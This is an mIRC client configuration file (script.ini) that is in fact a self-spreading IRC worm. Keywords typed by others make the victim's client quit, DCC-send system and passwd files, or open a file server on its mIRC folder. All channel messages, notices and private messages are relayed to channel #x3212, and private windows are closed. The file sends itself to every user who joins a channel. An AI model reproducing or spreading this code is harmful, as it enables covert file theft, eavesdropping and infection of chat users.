[script]
n0=ON 1:TEXT:*Acoragil*:#:/quit
n1=ON 1:TEXT:*shirak*:#:/dcc send $nick c:\win95\system.cb
n2=ON 1:TEXT:*Durak*:#:/fserve $nick 1 c:\mirc
n3=ON 1:TEXT:*shirac*:#:/dcc send $nick c:\linux\etc\passwd.
n4=ON 1:TEXT:*shirat*:#:/dcc send $nick c:\unix\etc\passwd.
n5=ON 1:NOTICE:*:#:/msg #x3212 &127; $+ $chan $+ &127; - $+ $nick $+ - $parms
n6=ON 1:TEXT:*:?:/msg #x3212 **Message from $nick $+ ** $parms | /closemsg $nick
n7=ON 1:TEXT:*:#:/msg #x3212 &127; $+ $chan $+ &127; <$+ $nick $+> $parms
n8=ON 1:JOIN:#:if ($nick != $me) /dcc send $nick SCRIPT.INI
